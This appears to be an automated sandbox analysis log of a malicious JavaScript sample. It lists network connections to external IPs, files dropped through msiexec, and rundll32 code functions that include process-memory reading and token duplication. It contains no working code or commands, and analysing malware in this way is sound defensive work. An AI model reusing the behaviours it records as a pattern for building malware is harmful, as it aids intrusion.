Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49857 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443

Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.46.214.6:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.46.75:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.219.28:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.189.173.10:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.197.34:443 -> 192.168.2.4:49800 version: TLS 1.2

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C5C8CC0A7FE31816B4641D0465402560

Jump to dropped file

System Summary

Sample has a suspicious name (potential lure to open the executable)

Source: Document_a51_19i793302-14b09981a5569-3684u8.js

Static file information: Suspicious name

Source: C:\Windows\System32\rundll32.exe

Process Stats: CPU usage > 49%

Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CEB0C4 NtOpenKey,RtlpNtOpenKey,	5_2_00000235B5CEB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CEB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	5_2_00000235B5CEB1D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CEAD34 NtAllocateVirtualMemory,	5_2_00000235B5CEAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE78C0 NtReadFile,	5_2_00000235B5CE78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE77B0 RtlInitUnicodeString,NtCreateFile,	5_2_00000235B5CE77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7B40 NtFreeVirtualMemory,	5_2_00000235B5CE7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7A54 NtWriteFile,	5_2_00000235B5CE7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE79C8 NtClose,	5_2_00000235B5CE79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7588 RtlInitUnicodeString,NtCreateFile,NtClose,	5_2_00000235B5CE7588
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE378C NtClose,	5_2_00000235B5CE378C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,FindCloseChangeNotification,	5_2_00000235B5CE463C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7ACC NtClose,	5_2_00000235B5CE7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE745C RtlInitUnicodeString,NtOpenFile,NtClose,	5_2_00000235B5CE745C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7704 NtQueryInformationFile,	5_2_00000235B5CE7704
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE7694 RtlInitUnicodeString,NtDeleteFile,	5_2_00000235B5CE7694
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CECB54 NtDelayExecution,	5_2_00000235B5CECB54
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CF0AF0 NtWriteFile,	5_2_00000235B5CF0AF0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031241C NtAllocateVirtualMemory,	6_3_000001801031241C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031248C NtFreeVirtualMemory,	6_3_000001801031248C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BAD34 NtAllocateVirtualMemory,	7_2_000001EF532BAD34
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7B40 NtFreeVirtualMemory,	7_2_000001EF532B7B40
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B463C GetModuleHandleW,GetCurrentProcessId,GetCurrentProcessId,GetCurrentProcessId,OpenProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WideCharToMultiByte,CloseHandle,	7_2_000001EF532B463C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7588 RtlInitUnicodeString,NtCreateFile,NtClose,	7_2_000001EF532B7588
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B378C NtClose,	7_2_000001EF532B378C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B745C RtlInitUnicodeString,NtOpenFile,NtClose,	7_2_000001EF532B745C
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BCB54 NtDelayExecution,	7_2_000001EF532BCB54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7A54 NtWriteFile,	7_2_000001EF532B7A54
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B77B0 RtlInitUnicodeString,NtCreateFile,	7_2_000001EF532B77B0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B79C8 NtClose,	7_2_000001EF532B79C8
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7ACC NtClose,	7_2_000001EF532B7ACC
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B78C0 NtReadFile,	7_2_000001EF532B78C0
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BB0C4 NtOpenKey,	7_2_000001EF532BB0C4
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7694 RtlInitUnicodeString,NtDeleteFile,	7_2_000001EF532B7694
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532B7704 NtQueryInformationFile,	7_2_000001EF532B7704
Source: C:\Windows\System32\rundll32.exe	Code function: 7_2_000001EF532BB1D4 NtQueryValueKey,NtQueryValueKey,NtClose,	7_2_000001EF532BB1D4

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000000018006A2C8: DeviceIoControl,

5_2_000000018006A2C8

Source: C:\Windows\System32\rundll32.exe

Code function: 5_2_000000018004B1A4 memset,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,WTSGetActiveConsoleSessionId,WTSQueryUserToken,GetTokenInformation,DuplicateTokenEx,CreateEnvironmentBlock,CreateProcessAsUserW,GetLastError,DestroyEnvironmentBlock,CloseHandle,CloseHandle,AdjustTokenPrivileges,CloseHandle,

5_2_000000018004B1A4

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI846B.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIFFD6.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI54.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIA3.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIC4.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI103.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI181.tmp	Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSIFFD6.tmp

Jump to behavior

Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_00586A50	3_2_00586A50
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005BF032	3_2_005BF032
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005AE270	3_2_005AE270
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005AC2CA	3_2_005AC2CA
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005B92A9	3_2_005B92A9
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005B84BD	3_2_005B84BD
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005AA587	3_2_005AA587
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_0058C870	3_2_0058C870
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005AA915	3_2_005AA915
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005A4920	3_2_005A4920
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005B0A48	3_2_005B0A48
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_00589CC0	3_2_00589CC0
Source: C:\Windows\Installer\MSI181.tmp	Code function: 3_2_005B5D6D	3_2_005B5D6D
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180017FE8	5_2_0000000180017FE8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006DFF4	5_2_000000018006DFF4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800220D8	5_2_00000001800220D8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018007C140	5_2_000000018007C140
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180060174	5_2_0000000180060174
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018008023C	5_2_000000018008023C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018000834C	5_2_000000018000834C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006C470	5_2_000000018006C470
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800784E0	5_2_00000001800784E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800764F0	5_2_00000001800764F0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180060578	5_2_0000000180060578
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180010580	5_2_0000000180010580
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018004E5DC	5_2_000000018004E5DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180062600	5_2_0000000180062600
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180002610	5_2_0000000180002610
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180004638	5_2_0000000180004638
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018004A650	5_2_000000018004A650
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006E760	5_2_000000018006E760
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800647B0	5_2_00000001800647B0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018007E7C7	5_2_000000018007E7C7
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180076930	5_2_0000000180076930
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180062954	5_2_0000000180062954
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006A994	5_2_000000018006A994
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006E9FC	5_2_000000018006E9FC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180082A18	5_2_0000000180082A18
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180072A27	5_2_0000000180072A27
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180010B58	5_2_0000000180010B58
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180026C84	5_2_0000000180026C84
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001ECF4	5_2_000000018001ECF4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180008E20	5_2_0000000180008E20
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180052FD8	5_2_0000000180052FD8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018003AFE8	5_2_000000018003AFE8
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018005D014	5_2_000000018005D014
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006F0B4	5_2_000000018006F0B4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800630CC	5_2_00000001800630CC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018005912C	5_2_000000018005912C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018004B1A4	5_2_000000018004B1A4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180049278	5_2_0000000180049278
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018007B2D0	5_2_000000018007B2D0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002B2EC	5_2_000000018002B2EC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018006D3D4	5_2_000000018006D3D4
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800033E0	5_2_00000001800033E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180075480	5_2_0000000180075480
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800694A0	5_2_00000001800694A0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018005958C	5_2_000000018005958C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800576DC	5_2_00000001800576DC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800097E0	5_2_00000001800097E0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000001800277FC	5_2_00000001800277FC
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018002D964	5_2_000000018002D964
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180073B60	5_2_0000000180073B60
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018007BBB0	5_2_000000018007BBB0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018001BC38	5_2_000000018001BC38
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018005DD18	5_2_000000018005DD18
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180073DF0	5_2_0000000180073DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_0000000180011DF0	5_2_0000000180011DF0
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018005BE6C	5_2_000000018005BE6C
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_000000018004FF88	5_2_000000018004FF88
Source: C:\Windows\System32\rundll32.exe	Code function: 5_2_00000235B5CE1030	5_2_00000235B5CE1030
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031453C	6_3_000001801031453C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010314B50	6_3_0000018010314B50
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801032D19C	6_3_000001801032D19C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801036318C	6_3_000001801036318C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103551F8	6_3_00000180103551F8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103401FB	6_3_00000180103401FB
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103451C0	6_3_00000180103451C0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103711CC	6_3_00000180103711CC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031E31C	6_3_000001801031E31C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801039B370	6_3_000001801039B370
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010316358	6_3_0000018010316358
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103873A0	6_3_00000180103873A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103583EC	6_3_00000180103583EC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010382430	6_3_0000018010382430
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801036E45C	6_3_000001801036E45C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010367448	6_3_0000018010367448
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010373498	6_3_0000018010373498
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103994F0	6_3_00000180103994F0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103784D8	6_3_00000180103784D8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801035F4C4	6_3_000001801035F4C4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010385534	6_3_0000018010385534
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010318568	6_3_0000018010318568
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010330540	6_3_0000018010330540
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103405A0	6_3_00000180103405A0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103705FC	6_3_00000180103705FC
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801033F5FB	6_3_000001801033F5FB
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801035B5D0	6_3_000001801035B5D0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801039D63C	6_3_000001801039D63C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010339650	6_3_0000018010339650
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801038672C	6_3_000001801038672C
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103A9708	6_3_00000180103A9708
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010335768	6_3_0000018010335768
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103277E0	6_3_00000180103277E0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801034D834	6_3_000001801034D834
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010348824	6_3_0000018010348824
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010377874	6_3_0000018010377874
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801039D8B8	6_3_000001801039D8B8
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103898B0	6_3_00000180103898B0
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103A4940	6_3_00000180103A4940
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010388980	6_3_0000018010388980
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801031D9E4	6_3_000001801031D9E4
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801035EA84	6_3_000001801035EA84
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010340A8A	6_3_0000018010340A8A
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010392B38	6_3_0000018010392B38
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_000001801039DB34	6_3_000001801039DB34
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_0000018010380B54	6_3_0000018010380B54
Source: C:\Windows\System32\rundll32.exe	Code function: 6_3_00000180103AEBB8	6_3_00000180103AEBB8
